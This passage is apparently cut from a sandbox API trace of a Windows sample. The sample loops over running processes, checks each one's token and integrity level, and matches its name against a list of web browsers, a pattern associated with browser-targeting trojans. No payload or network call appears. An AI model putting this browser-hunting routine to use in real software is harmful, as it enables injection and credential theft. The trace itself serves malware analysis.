(lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0514.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0514.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0514.732] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0514.732] GetLastError () returned 0x7a [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0514.732] CloseHandle (hObject=0x3bc) returned 1 [0514.732] CloseHandle (hObject=0x5a4) returned 1 [0514.732] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0514.732] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0514.732] GetLastError () returned 0x7a [0514.732] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0514.733] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0514.733] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0514.733] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0514.733] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0514.733] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0514.733] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0514.733] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0514.733] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0514.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0514.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0514.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0514.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0514.733] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0514.733] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0514.733] GetLastError () returned 0x7a [0514.733] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0514.733] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0514.733] CloseHandle (hObject=0x3bc) returned 1 [0514.733] CloseHandle (hObject=0x5a4) returned 1 [0514.733] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0514.733] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0514.733] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0514.733] GetLastError () returned 0x7a [0514.733] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0514.733] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0514.733] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0514.733] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0514.733] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0514.733] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0514.733] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0514.733] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0514.733] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0514.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0514.733] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0514.734] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0516.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa1a8) returned 0xc0000004 [0516.742] VirtualAlloc (lpAddress=0x0, dwSize=0xb1a8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0516.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb1a8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0516.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0516.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0516.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0516.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0516.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0516.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0516.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0516.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0516.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0516.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0516.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0516.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0516.746] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0516.746] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0516.746] GetLastError () returned 0x7a [0516.746] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0516.746] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0516.747] CloseHandle (hObject=0x3bc) returned 1 [0516.747] CloseHandle (hObject=0x5a4) returned 1 [0516.747] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0516.747] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0516.747] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0516.747] GetLastError () returned 0x7a [0516.747] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0516.748] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0516.748] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0516.748] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0516.748] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0516.748] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0516.748] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0516.748] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0516.748] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0516.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0516.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0516.748] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0516.749] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0516.749] GetLastError () returned 0x7a [0516.749] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0516.749] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0516.749] CloseHandle (hObject=0x3bc) returned 1 [0516.749] CloseHandle (hObject=0x5a4) returned 1 [0516.749] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0516.749] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0516.749] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0516.750] GetLastError () returned 0x7a [0516.750] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0516.750] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0516.750] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0516.750] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0516.750] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0516.750] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0516.750] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0516.750] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0516.750] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0516.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0516.751] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0516.751] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0516.751] GetLastError () returned 0x7a [0516.751] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0516.751] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0516.751] CloseHandle (hObject=0x3bc) returned 1 [0516.751] CloseHandle (hObject=0x5a4) returned 1 [0516.751] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0516.752] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0516.752] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0516.752] GetLastError () returned 0x7a [0516.752] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0516.752] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0516.752] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0516.752] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0516.752] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0516.752] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0516.752] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0516.753] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0516.753] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0516.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0516.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0516.753] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0516.753] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0516.753] GetLastError () returned 0x7a [0516.753] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0516.753] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0516.753] CloseHandle (hObject=0x3bc) returned 1 [0516.754] CloseHandle (hObject=0x5a4) returned 1 [0516.754] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0516.754] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0516.754] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0516.754] GetLastError () returned 0x7a [0516.754] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0516.754] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0516.754] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0516.755] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0516.755] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0516.755] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0516.755] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0516.755] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0516.755] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0516.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0516.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0516.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0516.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0516.755] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0516.756] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0516.756] GetLastError () returned 0x7a [0516.756] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0516.756] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0516.756] CloseHandle (hObject=0x3bc) returned 1 [0516.756] CloseHandle (hObject=0x5a4) returned 1 [0516.756] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0516.756] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0516.756] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0516.757] GetLastError () returned 0x7a [0516.757] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0516.757] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0516.757] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0516.757] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0516.757] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0516.757] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0516.757] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0516.757] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0516.758] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0516.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0516.758] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0516.759] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0518.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa1a8) returned 0xc0000004 [0518.770] VirtualAlloc (lpAddress=0x0, dwSize=0xb1a8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0518.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb1a8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0518.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0518.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0518.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0518.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0518.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0518.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0518.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0518.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 